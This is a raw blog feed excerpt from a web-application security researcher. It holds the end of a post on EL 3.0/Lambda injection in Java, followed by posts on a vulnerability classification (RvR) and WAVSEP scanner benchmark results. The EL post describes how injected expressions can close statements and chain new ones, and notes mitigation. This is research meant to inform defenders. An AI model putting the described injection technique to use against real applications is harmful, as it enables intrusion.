&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
out.println(sys);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
%&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
So due to the implementation of the semicolon operator, potential
injections can now CLOSE PREVIOUS STATEMENTS and start new statements, making
the potential injection almost as usable as SQL injection. Features such as EL
variable declaration, value assignments and others (watch the video) just add
more fuel to the fire.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
So much for enhanced security features.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
We already identified a few instances that affect real world
applications (no instances in core products, so far), and are currently
handling them infront of the relevant entities.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
I&#39;ll probably invest some more time in the upcoming weeks to see if any
prominent java projects are prone to this issue, but in the meantime, some
practical notes:&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
Regardless of how common these issues are, these potential exposures
could easily be identified in code reviews or by source code analysis tools
that track the effect of input on the various methods of the &lt;b&gt;ELProcessor&lt;/b&gt;
class, and on similar EL related classes.&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
Generic blind injection payloads can
be added as plugins for automated scanners, and we could go bug hunting to see
if any more of these potential issues exists in the wild.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
The mitigation is also simple, not embedding input into EL statements
and validating input in case you do.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
I&#39;ll update this post as the research progresses.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
Cheers&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/7411966009291787493/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2014/12/el-30-injection-java-is-getting-hacker.html#comment-form' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/7411966009291787493'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/7411966009291787493'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2014/12/el-30-injection-java-is-getting-hacker.html' title='EL 3.0/Lambda Injection: Hacker Friendly Java'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFIqqZVL38FOYvQOOmTBCNZi3aHvPYqBqhuLDnXxgnR8i3hXXYovtuIHy6W_zvacUe5nuv1yvyLr4emaB8Wv2Hj54ciz7MLAsoHLBT6Ag7oqlM_m1z0hj6FZBKJbYO0ATi25y6VNcsoQE/s72-c/javaprocnumber.png" height="72" width="72"/><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-7925024582674229613</id><published>2014-11-03T14:42:00.001-08:00</published><updated>2014-12-03T03:07:19.219-08:00</updated><title type='text'>Relative Vulnerability Rating (RvR.) and WAVSEP Results Update</title><content type='html'>&lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;[For a list of the most updated open source, commercial &amp;amp; SAAS scan results click &lt;a href=&quot;http://www.sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html&quot; target=&quot;_blank&quot;&gt;HERE&lt;/a&gt;]&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
The 2014 vulnerability scanner benchmark included &lt;b&gt;a lot&lt;/b&gt; of content, but not nearly as much as I originally planned to publish.&lt;br /&gt;
My original aim was to add additional comparison aspects, and provide an &lt;b&gt;initial&lt;/b&gt; formula for measuring the &lt;b&gt;VALUE &lt;/b&gt;of vulnerability scanners, and infosec products in general.&lt;br /&gt;
&lt;br /&gt;
Despite the help I got from volunteers and multiple kind souls, due to the fact that the new comparison aspects were progressing a bit slower than I hoped, I decided to release the content in February 2014, and process the rest of the data later.&lt;br /&gt;
&lt;br /&gt;
Its been more than 8 month of development, and although I can&#39;t claim all the content is ready for release, a significant portion of it is -&lt;br /&gt;
&lt;br /&gt;
A security-product-oriented &lt;b&gt;vulnerability classification &lt;/b&gt;called RvR.&lt;br /&gt;
&lt;h2 style=&quot;text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi95UtmUyjCEYsRp8FMWBmrOsm7lgifUle9751zUDHc2zDeycojNjjmyiMVmBJaWO7YSpYPZWDWXgwDomtsQ81DG_wi538Co0M1vREfOkN7bcqMPM581Tg9rIuT8xIyT9QTHAZyPPTWlJw/s1600/rvr-dot-hi-res.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi95UtmUyjCEYsRp8FMWBmrOsm7lgifUle9751zUDHc2zDeycojNjjmyiMVmBJaWO7YSpYPZWDWXgwDomtsQ81DG_wi538Co0M1vREfOkN7bcqMPM581Tg9rIuT8xIyT9QTHAZyPPTWlJw/s1600/rvr-dot-hi-res.png&quot; height=&quot;320&quot; width=&quot;316&quot; /&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;div&gt;
&lt;h2 style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;RvR - Relative Vulnerability Rating&lt;/b&gt;&amp;nbsp;&lt;/h2&gt;
&lt;/div&gt;
RvR includes a comprehensive collection of &lt;b&gt;GENERIC application-level attack vectors &lt;/b&gt;(e.g. sql injection, xss, etc), gathered from every prominent resource out there, and classified based on a &lt;b&gt;DETECTION &lt;/b&gt;vs. &lt;b&gt;PREVENTION &lt;/b&gt;approach.&lt;br /&gt;
&lt;br /&gt;
The list currently includes the incomprehensible number of &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;233&lt;/span&gt;&lt;/b&gt;, or to be exact, &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;233 &lt;/span&gt;generic ways &lt;/b&gt;to hack applications, that security products may be able to perform or prevent.&lt;br /&gt;
&lt;br /&gt;
Unlike &lt;a href=&quot;https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents&quot; target=&quot;_blank&quot;&gt;OWASP&lt;/a&gt; &lt;a href=&quot;https://www.owasp.org/index.php/Category:Attack&quot; target=&quot;_blank&quot;&gt;Attacks&lt;/a&gt; &amp;amp; &lt;a href=&quot;https://www.owasp.org/index.php/Category:Vulnerability&quot; target=&quot;_blank&quot;&gt;Vulnerabilities&lt;/a&gt;, &lt;a href=&quot;http://cwe.mitre.org/&quot; target=&quot;_blank&quot;&gt;CWE&lt;/a&gt;, &lt;a href=&quot;https://capec.mitre.org/&quot; target=&quot;_blank&quot;&gt;CAPEC&lt;/a&gt;, and&amp;nbsp;&lt;a href=&quot;http://projects.webappsec.org/w/page/13246978/Threat%20Classification&quot; target=&quot;_blank&quot;&gt;WASC Threat Classification&lt;/a&gt;,&lt;br /&gt;
The &lt;b&gt;RvR &lt;/b&gt;threat&amp;nbsp;classification aims to provide a common ground for &lt;b&gt;measuring&lt;/b&gt; the value of&amp;nbsp;&lt;b&gt;security products&lt;/b&gt;, starting with the security products in the &lt;b&gt;application security field&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
Each generic exposure in the classification is mapped to other prominent vulnerability classification lists, informative resources, videos, as well as a &lt;b&gt;relative&amp;nbsp;&lt;/b&gt;&lt;b&gt;severity&lt;/b&gt;, measured in relation to other RvR items, aimed to classify the importance of supporting features in each product.&lt;br /&gt;
&lt;br /&gt;
To make things simpler - it will enable measuring how much a security product covers in comparison to the whole collection of possible generic hacking methods, and in comparison to other products, and drill down into various quality aspects.&lt;br /&gt;
&lt;br /&gt;
I invested most of last few months implementing a framework for an online website infrastructure to present the RvR and WAVSEP data, and I&#39;m pretty close to the finish line.&lt;br /&gt;
&lt;br /&gt;
The list has already been distributed to vendors that asked to view it in advance, and will be published as soon as I make some adjustments to the initial website version.&lt;br /&gt;
&lt;br /&gt;
In the meantime,&lt;br /&gt;
I managed to update &lt;b&gt;some &lt;/b&gt;of the comparison results with a &lt;b&gt;few &lt;/b&gt;updated product versions, &amp;nbsp;and will try to find the time to update some more.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;Vulnerability Scanner Stats&lt;/b&gt;&lt;/a&gt; (latest &lt;b&gt;tested&lt;/b&gt;&amp;nbsp;versions):&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmN2QrVKBdPr9Wx8Yz9TxG7lkfxHRrfb-gZSSschpPxQih-7IRB8loBytAtcZNgWIVt17wKeuZhdO0gz9RrJTLZW93HQyv0nCcmll4rtuYG-CY_EgkTlyfzeiHHAWYRlnj-fpXDkfO2m0/s1600/commercial-scanners.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmN2QrVKBdPr9Wx8Yz9TxG7lkfxHRrfb-gZSSschpPxQih-7IRB8loBytAtcZNgWIVt17wKeuZhdO0gz9RrJTLZW93HQyv0nCcmll4rtuYG-CY_EgkTlyfzeiHHAWYRlnj-fpXDkfO2m0/s1600/commercial-scanners.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/7925024582674229613/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2014/11/relative-vulnerability-rating-rvr-and.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/7925024582674229613'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/7925024582674229613'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2014/11/relative-vulnerability-rating-rvr-and.html' title='Relative Vulnerability Rating (RvR.) and WAVSEP Results Update'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi95UtmUyjCEYsRp8FMWBmrOsm7lgifUle9751zUDHc2zDeycojNjjmyiMVmBJaWO7YSpYPZWDWXgwDomtsQ81DG_wi538Co0M1vREfOkN7bcqMPM581Tg9rIuT8xIyT9QTHAZyPPTWlJw/s72-c/rvr-dot-hi-res.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-8621053512762987821</id><published>2014-03-29T13:05:00.001-07:00</published><updated>2014-03-29T13:10:24.663-07:00</updated><title type='text'>WAVSEP 2014 Results Update</title><content type='html'>After the benchmark publication, several vendors contacted me with recommended configurations that could enhance their score, and with feature documentation corrections.&lt;br /&gt;
After testing the various provided configurations, I was able to update the various charts and data in the &lt;b&gt;benchmark original post&lt;/b&gt;, as well as the various charts in &lt;b&gt;&lt;a href=&quot;http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html&quot; target=&quot;_blank&quot;&gt;sectoolmarket&lt;/a&gt;&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
Update summary:&lt;br /&gt;
The WIVET score of Webinspect was slightly improved from 94% to &lt;b&gt;96%&lt;/b&gt; by selecting the &quot;depth first&quot; mode in the scan wizard (the default configuration still yields 94%), which makes it the official winner of the WIVET category.&lt;br /&gt;
&lt;br /&gt;
The path traversal detection score of &lt;b&gt;arachni &lt;/b&gt;was updated from 30.88% to 100% (!!!) by making use of the &lt;b&gt;source code disclosure&lt;/b&gt; plugin (as suggested by the vendor, in addition to the path traversal and local file inclusion plugins), which makes it the co-winner in this category, alongside &lt;b&gt;Appscan&lt;/b&gt;.&lt;br /&gt;
The LFI detection results of Webinspect were likewise improved from 72.06% to 91.18%, by using vendor recommended configuration that included the following plugins:&amp;nbsp;10287 – Local File Include, 10271 – Local File Inclusion/Reading Vulnerability, 10272 – Possible Local File Inclusion/Reading Vulnerability, 11327 – LFI Tomcat, 11332 – LFI IIS&lt;br /&gt;
&lt;br /&gt;
Finally, the list of supported &lt;b&gt;input vectors&lt;/b&gt;&amp;nbsp;was updated after the Appscan team reported support for 4 more vectors, the ZAP project reported support for additional two input vectors, and the arachni project reported support for one additional vector. All updates represent support in the &lt;b&gt;tested&lt;/b&gt;&amp;nbsp;versions.&lt;br /&gt;
&lt;br /&gt;
There may be some minor updates to the SQL injection results of one scanner - if the vendor provided configuration will work.&lt;br /&gt;
&lt;br /&gt;
As mentioned earlier, the benchmark charts already reflect the changes, and summarizing content will be published soon.</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/8621053512762987821/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2014/03/wavsep-2014-result-updates.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/8621053512762987821'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/8621053512762987821'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2014/03/wavsep-2014-result-updates.html' title='WAVSEP 2014 Results Update'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-2101745225525962438</id><published>2014-02-05T22:24:00.000-08:00</published><updated>2014-11-19T04:13:40.736-08:00</updated><title type='text'>WAVSEP Web Application Scanner Benchmark 2014</title><content type='html'>&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 26.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;WAVSEP 2013/2014 Score Chart:&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 26.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 44.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Web Application Vulnerability Scanners Benchmark &lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 24.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Commercial, SAAS &amp;amp; Open Source Scanners&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 24.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;An &lt;b&gt;Accuracy&lt;/b&gt;, &lt;b&gt;Coverage&lt;/b&gt;, &lt;b&gt;Versatility&lt;/b&gt;, &lt;b&gt;Adaptability&lt;/b&gt;,&lt;b&gt;
Feature&lt;/b&gt; and &lt;b&gt;Price&lt;/b&gt; Comparison of &lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 14.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;63&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; Black Box Web Application Vulnerability Scanners and SAAS
Services&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 26.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Part I&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 26.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;By &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;a href=&quot;https://twitter.com/sectooladdict&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Shay Chen&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Information Security Researcher, Analyst, Tool Author and Speaker&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Sponsored by&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnNXgwA3V3EbGbHURHxzQLfuNE2tixZs9L67UBHLnu4BZEK71qWnaTszwdIIwEbz6oPEUXFnKpDLJ3X_BoxJAlMmKXOF1E0bq_0Kc-LQ5_ZVXDyv0oPSpHjMfpsj0yRv03Xq3mZDUcMi0/s1600/DG_vert_col_strong.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnNXgwA3V3EbGbHURHxzQLfuNE2tixZs9L67UBHLnu4BZEK71qWnaTszwdIIwEbz6oPEUXFnKpDLJ3X_BoxJAlMmKXOF1E0bq_0Kc-LQ5_ZVXDyv0oPSpHjMfpsj0yRv03Xq3mZDUcMi0/s1600/DG_vert_col_strong.jpg&quot; height=&quot;84&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;Multiple content contributions by&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;https://twitter.com/ozhansisic&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Ozhan
Sisic&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; and &lt;/span&gt;&lt;a href=&quot;https://twitter.com/sharath_unni&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Sharath
